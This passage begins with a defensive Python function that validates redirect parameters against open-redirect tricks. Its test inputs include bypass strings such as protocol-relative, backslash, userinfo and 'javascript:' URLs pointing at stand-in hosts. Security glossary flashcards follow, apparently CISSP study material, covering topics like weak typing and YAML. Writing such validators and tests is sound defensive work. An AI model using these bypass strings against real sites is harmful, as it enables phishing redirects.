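backslash, scheme-less and userinfo tricks that browsers treat as off-site.
"""
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"app.example.com", "help.example.com"}   # hypothetical allowlist
DEFAULT_TARGET = "/dashboard"                              # hypothetical fallback


def safe_redirect_target(next_param: str) -> str:
    """Return a redirect target that stays on a trusted site, or the default."""
    if not next_param:
        return DEFAULT_TARGET
    candidate = next_param.strip()
    # Browsers normalise backslashes to slashes, so "/\evil" is really "//evil".
    candidate = candidate.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute URL: only https, only an allow-listed host, no "user@" trick.
        if (parts.scheme.lower() == "https"
                and parts.hostname in ALLOWED_HOSTS
                and not (parts.username or parts.password)):
            return candidate
        return DEFAULT_TARGET
    # Relative URL: a single leading slash; "//host" is protocol-relative.
    if candidate.startswith("/") and not candidate.startswith("//"):
        return candidate
    return DEFAULT_TARGET


if __name__ == "__main__":
    for value in ["/account/settings?tab=2", "//evil.example/phish", "/\\evil.example",
                  "https:evil.example", "javascript:alert(1)",
                  "https://app.example.com/reports", "https://app.example.com@evil.example/"]:
        print(f"{value!r:45} -> {safe_redirect_target(value)}")
```

The cases worth noting are the ones that pass a naive `startswith("/")` or `"example.com" in url` check: `//evil.example` (protocol-relative), `/\evil.example` (backslash), `https:evil.example` (no authority, which `urlsplit` exposes as an empty host) and `https://app.example.com@evil.example/`, where the trusted name is only the userinfo.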
205
# Define: Waterfall Development
A sequential project management methodology where each phase must be completed before moving to the next. ## Footnote A linear project management approach where progress flows downwards, similar to a waterfall, through various stages such as conception, initiation, analysis, design, construction, testing, deployment, and maintenance. Each stage must be fully completed before moving to the next, providing a structured, sequential process that leaves little room for backtracking or revising previous stages. *For more information, view this lecture on [Software development methodologies part 1.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182089-software-development-methodologies-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Waterfall_model).*
206
# Define: Weakly Typed - Programming Languages
Languages that implicitly convert between data types, so values of one type are silently reinterpreted as another during execution. ## Footnote In weakly typed programming languages, the language applies implicit conversions when an operation mixes types instead of rejecting it; JavaScript's `"1" == 1` evaluating to true, and C's willingness to treat any memory as any type through casts, are the usual examples. This is distinct from dynamic typing (variables not being bound to a type), although the two are often confused. The implicit conversions can lead to unexpected behavior if not carefully handled, and have a security dimension: comparisons that coerce strings and numbers (type juggling) have been used to bypass authentication and authorization checks. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Strong_and_weak_typing).*
207
# Define: Web Application Security
Protecting web applications from cyber threats through various security measures and monitoring. ## Footnote The process of protecting web applications by detecting, preventing, and responding to cyber threats. This discipline encompasses the security measures taken throughout the application's lifecycle, addressing vulnerabilities to prevent attacks such as SQL injection, cross-site scripting, and data breaches. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Web_application_security).*
208
# Define: Work Breakdown Structure | (WBS)
A project management tool decomposing a project into manageable tasks, useful for planning security projects. ## Footnote A tool used in project management that represents a hierarchical decomposition of a project into manageable components or tasks. In the context of a security project, the WBS might include tasks like threat modeling, security requirements analysis, and system hardening, each of which could be further broken down into more specific tasks. The WBS aids in tracking project progress, managing dependencies, and assigning resources. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Work_breakdown_structure).*
209
# Define: YAML | (YAML Ain't Markup Language)
YAML is a human-friendly, structured data serialization format often used for configuration files, supporting hierarchical and complex data representations. ## Footnote It relies on indentation rather than braces, enhancing readability. Commonly seen in DevOps tools like Ansible or Kubernetes, YAML defines services, deployment parameters, and more. Its flexible syntax simplifies manual editing, though strict indentation can cause parsing errors. With support in many programming languages, YAML has become a popular choice for easily maintainable, clear configuration management. One security caveat: YAML tags can instruct some parsers to instantiate arbitrary language objects, so untrusted YAML should only ever be parsed with a "safe" loader (for example PyYAML's `safe_load` rather than the full `load`). *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/YAML).*